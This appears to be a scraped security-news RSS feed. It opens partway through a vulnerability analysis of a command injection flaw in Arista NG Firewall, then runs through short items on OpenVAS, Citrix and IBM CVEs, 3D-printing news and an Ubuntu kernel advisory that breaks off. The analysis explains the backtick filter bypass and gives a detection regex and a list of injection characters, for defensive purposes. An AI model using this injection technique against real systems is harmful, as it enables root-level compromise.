  <p class="">•            An object is enclosed in curly braces {}.<br>•            An object consists of zero or more items delimited by a comma (",") character.<br>•            An item consists of a key and a value. A key is delimited from its value by a colon (":") character.<br>•            A key must be a string (enclosed in quotes).<br>•            A value must be a valid type. Valid types include string, number, JSON object, array, Boolean, or null.<br>•            An array is an object enclosed in square braces []. An array consists of zero or more string, number, JSON object, array, Boolean or null type-objects delimited by a comma (",") character.</p><p class="">An example JSON object is as follows:</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  

<p>The following is an example of a JSON-RPC request to the <code>runTroubleshooting()</code> method that is relevant to this report:</p>


  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  

<p>A command injection vulnerability has been reported in Arista NG Firewall. The vulnerability is due to improper validation of user data that is used in a command line. The <code>runTroubleshooting()</code> method of the class <code>NetworkManagerImpl</code> will be used to handle JSON-RPC requests to the <code>runTroubleshooting</code> method. The command parameter passed to the method will be the first element in the <code>params</code> JSON array in the body of the request. This value must be one of the strings in the <code>TroubleshootingCommands enum</code> defined in the <code>NetworkManager</code> class. The second parameter of the method will contain additional arguments passed to the JSON-RPC call.</p>
<p>The method will first iterate through each of the additional arguments and combine each key value pair into a single string, separated by a "=" character that will later be used as an environment variable. Next, a switch case statement is used to ensure the provided command is one of the values in <code>TroubleshootingCommands</code>. Each command value will be processed using the same code. </p>
<p>The method will next iterate through each environment variable, and inspect it for the following common command injection strings:</p>
<p>          <code>; &amp; | &gt; $(</code></p>
<p>If any are found, the request will be rejected, and an exception is thrown. If each environment variable is valid, the method <code>execEvil()</code> is called to create and execute a command line for the network-troubleshooting.sh script, with the environment variables passed as a parameter. The <code>execEvil()</code> method in turn will call <code>Runtime.getRuntime().exec()</code> to run the script, with the second parameter passing the environment variables that will be used by the script. Each command value will have a function in network-troubleshooting.sh, such as <code>run_dns()</code> for the “DNS” command value. Each function will follow a similar structure, by creating a CMD string using the environment variables passed by <code>exec()</code> and then calling eval to execute it.</p>
<p>However, the values of the parameters passed to the <code>runTroubleshooting</code> JSON-RPC method are not completely sanitized before it is used in the command line. While the parameters passed to the endpoint are inspected for some shell metacharacters, the list is incomplete. For example, the backtick character (`) is not included in the check and may be used to inject a command.</p>
<p>For example:</p>


  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  

<p>The example above will write and execute a python script on the server to achieve code execution without using any restricted characters.</p>
<p>A remote, authenticated attacker could exploit this vulnerability by sending a JSON-RPC request to the <code>runTroubleshooting</code> method containing a crafted “HOST” or “URL” parameter containing shell metacharacters not present in the <code>runTroubleshooting()</code> check. Successful exploitation in the worst case will result in arbitrary command execution under the security context of the root user.</p>
<p><b data-preserve-html-node="true">Detection Guidance</b></p>
<p>To detect an attack exploiting this vulnerability, the detection device must monitor and parse traffic on the following ports:<br>          -	HTTP, over port 80/TCP<br>          -	HTTPS, over port 443/TCP</p>
<p>Traffic to Arista NG Firewall may be encrypted and must be decrypted prior to applying this guidance. </p>
<p>The detection device must search for HTTP POST requests made to the request-URI <code>/admin/JSON-RPC</code>. If found, the body of the request must be parsed as JSON. The JSON object in the body must be inspected for a <code>method</code> key, and its value must be inspected to contain the substring <code>runTroubleshooting</code>. If found, the object must also be inspected for the JSON key "params", with a value containing a JSON array. The first entry in the JSON array must be inspected for any of the following strings:</p>


  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  

<p>If found, the second entry in the array must be inspected for a JSON object, and inspected for any of the following keys:</p>


  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  

<p>If either is found, the corresponding value to the key must be inspected for any of the following command injection characters:</p>


  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  

<p>If found, the traffic should be treated as suspicious; an attack exploiting this vulnerability is likely underway.</p>
<p>The following regular expression can be applied to find malicious requests:</p>
<p>          <code>/\x22(HOST|URL)\x22\s*:\s*\x22(?:[^\x22\\]|\\.)*?[\x60\x27\x24\x3c]/</code></p>
<p>Notes:</p>
<p>•	String matching on the request-URI and all JSON strings should be done in a case sensitive manner.<br>•	The JSON strings may be encoded and must be decoded prior to applying this guidance.<br>•	The request-URI may be URL-encoded and must be decoded before applying this guidance.</p>




  <p class=""><strong>Conclusion</strong></p><p class="">This vulnerability has been addressed by Arista with their <a href="https://www.arista.com/en/support/advisories-notices/security-advisory/22535-security-advisory-0123">Security Advisory 0123</a>. They note that the Arista Edge Threat Management - Arista Next Generation Firewall (Formerly Untangle) is affected by this bug, but other product versions are not. They also state the following mitigation can be applied:</p><p class=""><em>Do not allow non-authorized administrative access or access to the administrative browser.</em></p><p class="">However, the more appropriate action is to apply the provided vendor security patch by upgrading to version 17.4 or higher.</p><p class="">Special thanks to Jonathan Lein and Simon Humbert of the TrendAI Research team for providing such a thorough analysis of this vulnerability. For an overview of TrendAI  Research services, please visit <a href="https://go.trendmicro.com/tis/vulnerabilities.html">https://go.trendmicro.com/tis/vulnerabilities.html</a>.</p><p class="">The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the team on <a href="https://www.twitter.com/thezdi">Twitter</a>, <a href="https://infosec.exchange/@thezdi">Mastodon</a>, <a href="https://www.linkedin.com/company/zerodayinitiative">LinkedIn</a>, or <a href="https://bsky.app/profile/thezdi.bsky.social">Bluesky</a> for the latest in exploit techniques and security patches.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning]]></title>
<description><![CDATA[Is the previous tutorial Vulnerability Scanning with OpenVAS 9.0 part 1 we’ve gone through the installation process of OpenVAS on Kali Linux and the installation of the virtual appliance. In this tutorial we will learn how to configure and run a vulnerability scan. For demonstration purposes we’v...]]></description>
<link>https://tsecurity.de/de/3694244/it-security-nachrichten/vulnerability-scanning-with-openvas-9-part-2-vulnerability-scanning/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694244/it-security-nachrichten/vulnerability-scanning-with-openvas-9-part-2-vulnerability-scanning/</guid>
<pubDate>Sat, 25 Jul 2026 18:52:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Is the previous tutorial Vulnerability Scanning with OpenVAS 9.0 part 1 we’ve gone through the installation process of OpenVAS on Kali Linux and the installation of the virtual appliance. In this tutorial we will learn how to configure and run a vulnerability scan. For demonstration purposes we’ve also installed a virtual machine with Metasploitable 2 [...]</p>
<p>The post <a href="https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-openvas-9-0-part-2/">Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning</a> appeared first on <a href="https://www.hackingtutorials.org/">Hacking Tutorials</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2019-19781: Citrix ADC RCE vulnerability]]></title>
<description><![CDATA[A week before the 2019 holidays Citrix announced that an authentication bypass vulnerability was discovered in multiple Citrix products. The affected products are the Citrix Application Delivery Controller (formerly known as NetScaler AD), Citrix Gateway NetScaler ADC (formerly known as NetScaler...]]></description>
<link>https://tsecurity.de/de/3694241/it-security-nachrichten/cve-2019-19781-citrix-adc-rce-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694241/it-security-nachrichten/cve-2019-19781-citrix-adc-rce-vulnerability/</guid>
<pubDate>Sat, 25 Jul 2026 18:52:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A week before the 2019 holidays Citrix announced that an authentication bypass vulnerability was discovered in multiple Citrix products. The affected products are the Citrix Application Delivery Controller (formerly known as NetScaler AD), Citrix Gateway NetScaler ADC (formerly known as NetScaler Gateway), and Citrix SD-WAN WANOP appliance. Exploiting the vulnerability could allow an unauthenticated attacker [...]</p>
<p>The post <a href="https://www.hackingtutorials.org/exploit-tutorials/cve-2019-19781-citrix-adc-rce-vulnerability/">CVE-2019-19781: Citrix ADC RCE vulnerability</a> appeared first on <a href="https://www.hackingtutorials.org/">Hacking Tutorials</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[BOFH: This printer engineer knows every trick in the book]]></title>
<description><![CDATA[But so does this customer]]></description>
<link>https://tsecurity.de/de/3693386/it-nachrichten/bofh-this-printer-engineer-knows-every-trick-in-the-book/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693386/it-nachrichten/bofh-this-printer-engineer-knows-every-trick-in-the-book/</guid>
<pubDate>Sat, 25 Jul 2026 09:24:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[But so does this customer]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-40230 | IBM MQ Appliance 9.2 CD/9.2 LTS/9.3 CD/LTS 9.3 session expiration (EUVD-2022-43528 / XFDB-235532)]]></title>
<description><![CDATA[A vulnerability was found in IBM MQ Appliance 9.2 CD/9.2 LTS/9.3 CD/LTS 9.3 and classified as problematic. This affects an unknown function. Executing a manipulation can lead to session expiration.

This vulnerability is tracked as CVE-2022-40230. The attack can be launched remotely. No exploit e...]]></description>
<link>https://tsecurity.de/de/3692534/sicherheitsluecken/cve-2022-40230-ibm-mq-appliance-92-cd92-lts93-cdlts-93-session-expiration-euvd-2022-43528-xfdb-235532/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692534/sicherheitsluecken/cve-2022-40230-ibm-mq-appliance-92-cd92-lts93-cdlts-93-session-expiration-euvd-2022-43528-xfdb-235532/</guid>
<pubDate>Fri, 24 Jul 2026 23:15:55 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/ibm:mq_appliance">IBM MQ Appliance 9.2 CD/9.2 LTS/9.3 CD/LTS 9.3</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This affects an unknown function. Executing a manipulation can lead to session expiration.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2022-40230">CVE-2022-40230</a>. The attack can be launched remotely. No exploit exists.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Last Call for Prime Day: Nab My Favorite 3D Printer for $100 Less, Plus Accessory and Consumables Deals]]></title>
<description><![CDATA[Prime Day and Bambu Lab’s anniversary sale brought tons of deals on top-rated 3D printer models. Here are the ones I recommend.]]></description>
<link>https://tsecurity.de/de/3692451/it-nachrichten/last-call-for-prime-day-nab-my-favorite-3d-printer-for-100-less-plus-accessory-and-consumables-deals/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692451/it-nachrichten/last-call-for-prime-day-nab-my-favorite-3d-printer-for-100-less-plus-accessory-and-consumables-deals/</guid>
<pubDate>Fri, 24 Jul 2026 22:20:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Prime Day and Bambu Lab’s anniversary sale brought tons of deals on top-rated 3D printer models. Here are the ones I recommend.]]></content:encoded>
</item>
<item>
<title><![CDATA[Elegoo H1 HT review: This filament drybox finally fixes the biggest issue with the Centauri Carbon 2 3D printer — and feels like a sign that Elegoo's getting serious with its upgrades now]]></title>
<description><![CDATA[Elegoo's first filament dryer is a perfect partner to the Centuri Carbon 2, reaching 85°C with a rotating spool, dual automatic vents, and material presets.]]></description>
<link>https://tsecurity.de/de/3691743/it-nachrichten/elegoo-h1-ht-review-this-filament-drybox-finally-fixes-the-biggest-issue-with-the-centauri-carbon-2-3d-printer-and-feels-like-a-sign-that-elegoos-getting-serious-with-its-upgrades-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691743/it-nachrichten/elegoo-h1-ht-review-this-filament-drybox-finally-fixes-the-biggest-issue-with-the-centauri-carbon-2-3d-printer-and-feels-like-a-sign-that-elegoos-getting-serious-with-its-upgrades-now/</guid>
<pubDate>Fri, 24 Jul 2026 16:05:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Elegoo's first filament dryer is a perfect partner to the Centuri Carbon 2, reaching 85°C with a rotating spool, dual automatic vents, and material presets.]]></content:encoded>
</item>
<item>
<title><![CDATA[Netto erhält weltweit ersten Supermarkt aus dem 3D-Drucker]]></title>
<description><![CDATA[Im Schwarzwald entsteht der weltweit erste Supermarkt aus dem 3D-Drucker.
Aleksej Keksel



In der beschaulichen Gemeinde Neubulach im Nordschwarzwald nähe Calw wird derzeit Bau- und Digitalgeschichte geschrieben. Denn hier findet eine Weltpremiere statt: Es entsteht der weltweit erste Supermarkt...]]></description>
<link>https://tsecurity.de/de/3691541/it-security-nachrichten/netto-erhaelt-weltweit-ersten-supermarkt-aus-dem-3d-drucker/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691541/it-security-nachrichten/netto-erhaelt-weltweit-ersten-supermarkt-aus-dem-3d-drucker/</guid>
<pubDate>Fri, 24 Jul 2026 14:39:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/3D-Druck-Supermarkt-Neubulach_04-scaled_16_9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Printing" class="wp-image-4201215" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Im Schwarzwald entsteht der weltweit erste Supermarkt aus dem 3D-Drucker.</p>
</figcaption></figure><p class="imageCredit">Aleksej Keksel</p></div>



<p class="wp-block-paragraph">In der beschaulichen Gemeinde <a href="https://de.wikipedia.org/wiki/Neubulach" target="_blank" rel="noreferrer noopener">Neubulach</a> im Nordschwarzwald nähe Calw wird derzeit Bau- und Digitalgeschichte geschrieben. Denn hier findet eine Weltpremiere statt: Es entsteht der weltweit erste Supermarkt aus dem 3D-Betondrucker. Mieter wird der Discounter Netto.</p>



<p class="wp-block-paragraph">Mit einer Grundfläche von rund 1.700 Quadratmetern und einer gedruckten Wandfläche von über 1.300 Quadratmetern setzt das Projekt neue Maßstäbe für den industriellen Einsatz automatisierter Bauverfahren. Wo früher Maurer Stein auf Stein setzten, ziehen heute zwei mobile <a href="https://instatiq.com/" target="_blank" rel="noreferrer noopener">Instatiq</a> P1 Roboter (Progress One) präzise ihre Bahnen.</p>



<h2 class="wp-block-heading">Roboter statt Kelle und Mörtel</h2>



<p class="wp-block-paragraph">Die Maschinen spritzen den Beton Schicht für Schicht übereinander, bis Wände mit einer Höhe von bis zu sieben Metern entstehen. Dabei können die Roboter auf der Baustelle flexibel umgesetzt und neu positioniert werden. Das ermöglicht den Bau großflächiger Gewerbeimmobilien in Rekordzeit.</p>



<p class="wp-block-paragraph">So wurde der gesamte Wandrohbau inklusive aller baulichen Schnittstellen in nur etwa vier Wochen realisiert. „Mit dem ersten gedruckten Supermarkt zeigen wir, dass 3D-Druck im realen Gewerbebau angekommen ist“, erklärt Markus Schilling von Instatiq. Gleichzeitig zeigt das Projekt, dass der 3D-Druck nicht länger nur für <a href="https://www.computerwoche.de/article/2800278/die-ersten-haeuser-aus-dem-printer.html?utm=hybrid_search">kleine Pilotprojekte oder Wohnhäuser</a> reserviert ist. Für Optimisten stellt er gar eine wirtschaftlich relevante Alternative für den großflächigen Handel dar.</p>



<h2 class="wp-block-heading">Grüner Beton</h2>



<p class="wp-block-paragraph">Während die Druckroboter die Hauptarbeit an den Wänden leisten, wird die Konstruktion durch konventionelle Bauteile wie Stützen und Ringbalken ergänzt. Diese Verzahnung von digitaler Bauvorbereitung und klassischem Rohbau war eine der Herausforderungen, die durch die Zusammenarbeit von Firmen wie <a href="https://nelcon.de/">Nelcon</a> und der Köhler Bauunternehmung gemeistert wurde.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/3D-Druck-Supermarkt-Neubulach_05-scaled_16_9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Printing" class="wp-image-4201216" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Schicht für Schicht werden die Wände aus fast CO₂-neutralem Beton gedruckt.</p></figcaption></figure><p class="imageCredit">Aleksej Keksel</p></div>



<p class="wp-block-paragraph">Doch nicht nur die Technik ist revolutionär, sondern auch das Material. Zum ersten Mal wird bei einem solchen Großprojekt der Near-Zero-Zement evoZero von <a href="https://www.heidelbergmaterials.de/de" target="_blank" rel="noreferrer noopener">Heidelberg Materials</a> eingesetzt. Dieser Zement basiert auf der sogenannten CCS-Technologie (Carbon Capture and Storage). Dabei wird das CO₂ direkt im Werk im norwegischen Brevik abgeschieden und anschließend dauerhaft im Meeresboden gespeichert.</p>



<h2 class="wp-block-heading">Nachhaltiger Gewerbebau</h2>



<p class="wp-block-paragraph">Das Ergebnis ist ein 3D-Druckbeton, der signifikant weniger CO₂ verursacht, ohne dass die Rezeptur oder die technischen Eigenschaften – wie Pumpfähigkeit und Formstabilität – verändert wurden. Matthias Fischer von Heidelberg Materials betont denn auch: „Hier kommen zwei zukunftsweisende Ansätze unter realen Bedingungen zusammen: innovative Materialien und neue Bauverfahren.“</p>



<p class="wp-block-paragraph">Hinter dem Projekt steht ein breites Partnernetzwerk. Bauherr ist die Bäckerei Sehne, die das Gebäude nach Fertigstellung an den Lebensmittelhändler Netto Marken-Discount vermieten wird. Für Netto ist die Filiale in Neubulach ein klares Bekenntnis zu Innovation und Ressourcenschonung. So heißt es bei dem Discounter: „Der Einsatz von 3D-Druck zeigt, wie sich innovative Technologien bereits heute effizient und nachhaltiger im Filialbau einsetzen lassen.“</p>



<p class="wp-block-paragraph">Unter dem Strich ist der Supermarkt in Neubulach mehr als nur ein Gebäude. Er ist schlicht ein Beweis dafür, dass automatisiertes, schnelles und nachhaltigeres Bauen keine Zukunftsmusik mehr ist. Mit rund 292 Kubikmetern Druckbeton ist das Projekt laut Instatiq derzeit das weltweit größte realisierte 3D-gedruckte Gebäude.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8595-2: Linux kernel (AWS) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3691499/unix-server/usn-8595-2-linux-kernel-aws-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691499/unix-server/usn-8595-2-linux-kernel-aws-vulnerabilities/</guid>
<pubDate>Fri, 24 Jul 2026 14:17:43 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - Clock framework and drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO ADC drivers;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Remote Processor subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - SPI subsystem;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IP tunnels definitions;
  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - Cryptographic library;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - IPv6 networking;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - Landlock security;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40135, CVE-2025-40150, CVE-2025-68175, CVE-2025-68239,
CVE-2025-68334, CVE-2025-68736, CVE-2025-71152, CVE-2025-71161,
CVE-2025-71203, CVE-2025-71221, CVE-2025-71269, CVE-2025-71287,
CVE-2025-71288, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23104, CVE-2026-23118,
CVE-2026-23138, CVE-2026-23154, CVE-2026-23157, CVE-2026-23171,
CVE-2026-23207, CVE-2026-23226, CVE-2026-23227, CVE-2026-23244,
CVE-2026-23245, CVE-2026-23246, CVE-2026-23253, CVE-2026-23255,
CVE-2026-23270, CVE-2026-23271, CVE-2026-23276, CVE-2026-23277,
CVE-2026-23279, CVE-2026-23281, CVE-2026-23284, CVE-2026-23285,
CVE-2026-23286, CVE-2026-23287, CVE-2026-23289, CVE-2026-23290,
CVE-2026-23291, CVE-2026-23292, CVE-2026-23293, CVE-2026-23296,
CVE-2026-23298, CVE-2026-23300, CVE-2026-23302, CVE-2026-23303,
CVE-2026-23304, CVE-2026-23306, CVE-2026-23307, CVE-2026-23308,
CVE-2026-23310, CVE-2026-23312, CVE-2026-23313, CVE-2026-23315,
CVE-2026-23317, CVE-2026-23318, CVE-2026-23319, CVE-2026-23321,
CVE-2026-23324, CVE-2026-23325, CVE-2026-23330, CVE-2026-23334,
CVE-2026-23335, CVE-2026-23336, CVE-2026-23339, CVE-2026-23340,
CVE-2026-23343, CVE-2026-23347, CVE-2026-23352, CVE-2026-23356,
CVE-2026-23357, CVE-2026-23359, CVE-2026-23360, CVE-2026-23361,
CVE-2026-23362, CVE-2026-23363, CVE-2026-23364, CVE-2026-23365,
CVE-2026-23367, CVE-2026-23368, CVE-2026-23369, CVE-2026-23370,
CVE-2026-23372, CVE-2026-23374, CVE-2026-23375, CVE-2026-23378,
CVE-2026-23379, CVE-2026-23381, CVE-2026-23382, CVE-2026-23383,
CVE-2026-23386, CVE-2026-23387, CVE-2026-23388, CVE-2026-23389,
CVE-2026-23391, CVE-2026-23395, CVE-2026-23396, CVE-2026-23397,
CVE-2026-23398, CVE-2026-23399, CVE-2026-23401, CVE-2026-23412,
CVE-2026-23413, CVE-2026-23414, CVE-2026-23418, CVE-2026-23419,
CVE-2026-23420, CVE-2026-23426, CVE-2026-23434, CVE-2026-23438,
CVE-2026-23439, CVE-2026-23440, CVE-2026-23441, CVE-2026-23442,
CVE-2026-23444, CVE-2026-23446, CVE-2026-23447, CVE-2026-23448,
CVE-2026-23449, CVE-2026-23452, CVE-2026-23454, CVE-2026-23456,
CVE-2026-23457, CVE-2026-23458, CVE-2026-23460, CVE-2026-23461,
CVE-2026-23462, CVE-2026-23463, CVE-2026-23464, CVE-2026-23465,
CVE-2026-23468, CVE-2026-23470, CVE-2026-23474, CVE-2026-23475,
CVE-2026-31389, CVE-2026-31391, CVE-2026-31392, CVE-2026-31393,
CVE-2026-31394, CVE-2026-31396, CVE-2026-31399, CVE-2026-31400,
CVE-2026-31403, CVE-2026-31405, CVE-2026-31407, CVE-2026-31408,
CVE-2026-31409, CVE-2026-31412, CVE-2026-31413, CVE-2026-31414,
CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31421,
CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31425,
CVE-2026-31426, CVE-2026-31427, CVE-2026-31428, CVE-2026-31429,
CVE-2026-31430, CVE-2026-31432, CVE-2026-31433, CVE-2026-31434,
CVE-2026-31438, CVE-2026-31439, CVE-2026-31440, CVE-2026-31441,
CVE-2026-31446, CVE-2026-31447, CVE-2026-31449, CVE-2026-31450,
CVE-2026-31451, CVE-2026-31452, CVE-2026-31453, CVE-2026-31454,
CVE-2026-31455, CVE-2026-31458, CVE-2026-31464, CVE-2026-31466,
CVE-2026-31467, CVE-2026-31469, CVE-2026-31470, CVE-2026-31473,
CVE-2026-31474, CVE-2026-31476, CVE-2026-31477, CVE-2026-31480,
CVE-2026-31482, CVE-2026-31483, CVE-2026-31485, CVE-2026-31487,
CVE-2026-31488, CVE-2026-31489, CVE-2026-31492, CVE-2026-31494,
CVE-2026-31495, CVE-2026-31496, CVE-2026-31497, CVE-2026-31498,
CVE-2026-31499, CVE-2026-31500, CVE-2026-31502, CVE-2026-31503,
CVE-2026-31505, CVE-2026-31507, CVE-2026-31508, CVE-2026-31509,
CVE-2026-31510, CVE-2026-31511, CVE-2026-31512, CVE-2026-31515,
CVE-2026-31516, CVE-2026-31518, CVE-2026-31519, CVE-2026-31520,
